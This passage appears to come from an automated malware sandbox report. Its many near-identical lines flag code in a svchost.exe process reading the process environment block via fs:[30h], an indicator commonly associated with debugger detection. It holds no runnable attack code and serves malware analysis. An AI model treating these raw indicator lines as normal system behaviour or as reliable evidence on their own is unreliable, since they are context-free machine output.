            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
